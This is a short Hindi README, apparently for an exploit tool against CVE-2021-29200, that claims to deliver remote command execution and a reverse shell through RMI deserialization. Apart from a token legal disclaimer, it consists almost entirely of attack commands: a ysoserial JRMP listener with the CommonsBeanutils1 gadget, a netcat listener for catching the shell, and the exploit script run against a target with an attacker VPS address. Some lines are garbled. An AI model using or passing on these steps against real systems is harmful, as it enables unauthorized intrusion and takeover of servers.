
CVE-2021-29200 के लिए exploit, जो RMI deserialization हमले, JRMP listener और reverse shell payload वितरण के माध्यम से remote command execution को सक्षम बनाता है।
CVE-2021-29200 EXP सफलतापूर्वक रिवर्स शेल प्राप्त कर सकता है
यह लेख और उपकरण केवल तकनीकी साझाकरण के लिए है, गैरकानूनी उपयोग सख्त वर्जित है, अन्यथा होने वाले सभी परिणाम स्वयं वहन करने होंगे।
RMI सुनने के लिए पोर्ट 9999 प्रारंभ करेंjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
nc8443nc -lvp 8443
python3 cve-2021-29200_exp.py <target> <vps_ip> <vps_port>
